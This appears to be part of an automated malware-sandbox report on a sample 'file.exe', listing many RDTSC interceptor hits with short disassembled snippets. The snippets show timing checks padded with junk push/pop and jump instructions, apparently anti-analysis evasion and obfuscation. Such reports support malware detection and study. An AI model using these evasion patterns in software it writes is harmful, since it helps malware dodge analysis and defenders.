Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B65D second address: C6B663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B976 second address: C6B982 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F0F34BEC146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BACC second address: C6BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BAD2 second address: C6BADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BADF second address: C6BAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0F345319E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BEFB second address: C6BEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C755 second address: C6C75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C75B second address: C6C75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C75F second address: C6C765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C765 second address: C6C76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C818C6 second address: C818D9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F345319E6h 0x00000008 jns 00007F0F345319E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86161 second address: C86177 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F34BEC146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F0F34BEC146h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C862C9 second address: C862E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0F345319ECh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8C856 second address: C8C85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C947EF second address: C94818 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F345319EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0F345319FDh 0x00000010 jmp 00007F0F345319EDh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C946A3 second address: C946A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9D9FF second address: C9DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DA03 second address: C9DA29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC152h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0F34BEC148h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DD69 second address: C9DD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DD6D second address: C9DD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DD73 second address: C9DDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F345319F6h 0x0000000f jmp 00007F0F345319F5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DDA8 second address: C9DDD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC150h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F0F34BEC14Ch 0x00000011 ja 00007F0F34BEC146h 0x00000017 js 00007F0F34BEC152h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DF04 second address: C9DF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0AC second address: C9E0B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0B1 second address: C9E0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F0F345319E6h 0x00000010 jmp 00007F0F345319EEh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F0F345319FCh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E0DB second address: C9E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007F0F34BEC146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EB45 second address: C9EB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EB62 second address: C9EB6C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1649 second address: CA1666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1666 second address: CA166A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA166A second address: CA166E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA166E second address: CA168D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC159h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3E5B second address: CA3E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB1036 second address: CB1046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB1046 second address: CB104A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB104A second address: CB106C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F34BEC173h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F34BEC152h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBD96A second address: CBD96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFBDC second address: CBFBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6FC1 second address: BB6FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6FCD second address: BB6FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC3C3A second address: CC3C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC576C second address: CC57CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0F34BEC14Dh 0x00000010 jp 00007F0F34BEC146h 0x00000016 jmp 00007F0F34BEC155h 0x0000001b popad 0x0000001c push ebx 0x0000001d jmp 00007F0F34BEC152h 0x00000022 pop ebx 0x00000023 popad 0x00000024 pushad 0x00000025 jnc 00007F0F34BEC152h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC0F81 second address: BC0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD5D5 second address: CDD5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDD5D9 second address: CDD5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0F345319E6h 0x0000000f je 00007F0F345319E6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDB6F second address: CDDB77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDB77 second address: CDDB7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDF8D second address: CDDF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDF91 second address: CDDFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F345319E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F0F345319E6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDFA7 second address: CDDFD5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F34BEC14Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jmp 00007F0F34BEC156h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDFD5 second address: CDDFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE265 second address: CDE270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE3B9 second address: CDE3D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jns 00007F0F345319E6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F0F345319E8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE3D3 second address: CDE3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1024 second address: CE102B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE124D second address: CE1253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1371 second address: CE1375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1375 second address: CE13AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F0F34BEC155h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE13AD second address: CE13B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1628 second address: CE162E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE162E second address: CE1673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007F0F34531A00h 0x0000000d nop 0x0000000e mov dl, 4Ah 0x00000010 push dword ptr [ebp+122D26C2h] 0x00000016 sbb edx, 4D93AAF0h 0x0000001c call 00007F0F345319E9h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1673 second address: CE1679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1679 second address: CE1690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0F345319E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1690 second address: CE16A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F34BEC148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE3F7C second address: CE3F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5ED2 second address: CE5ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70D67 second address: 4C70D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70D6B second address: 4C70D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70D71 second address: 4C70DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F345319F2h 0x00000008 pop eax 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0F345319EFh 0x00000019 sub esi, 3316762Eh 0x0000001f jmp 00007F0F345319F9h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F0F345319F0h 0x0000002b xor ecx, 7C7773A8h 0x00000031 jmp 00007F0F345319EBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70DE5 second address: 4C70E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov di, 6516h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0F34BEC155h 0x00000019 and ah, 00000076h 0x0000001c jmp 00007F0F34BEC151h 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E23 second address: 4C70E54 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0F345319F3h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F345319F0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E54 second address: 4C70E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E5A second address: 4C70E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E60 second address: 4C70E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E64 second address: 4C70E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E68 second address: 4C70E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F34BEC14Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E7E second address: 4C70E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70E84 second address: 4C70E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CB3 second address: 4C60CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CC3 second address: 4C60CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CC7 second address: 4C60CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319ECh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B76 second address: 4CA0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B7C second address: 4CA0B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B80 second address: 4CA0C0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, 861Bh 0x00000011 mov si, 68F7h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F0F34BEC153h 0x0000001e adc si, BD7Eh 0x00000023 jmp 00007F0F34BEC159h 0x00000028 popfd 0x00000029 mov esi, 4043FBC7h 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F0F34BEC14Ah 0x00000035 mov ebp, esp 0x00000037 jmp 00007F0F34BEC150h 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F0F34BEC157h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0C0E second address: 4CA0C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0C14 second address: 4CA0C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C400E7 second address: 4C40113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esp 0x00000007 jmp 00007F0F345319EAh 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F0F345319F0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40113 second address: 4C40119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40119 second address: 4C4011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4011F second address: 4C40123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40123 second address: 4C40143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx esi, dx 0x0000001d mov ch, dh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60A0B second address: 4C60A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60567 second address: 4C6058F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4512E871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F0F345319ECh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F345319EEh 0x00000018 rdtsc
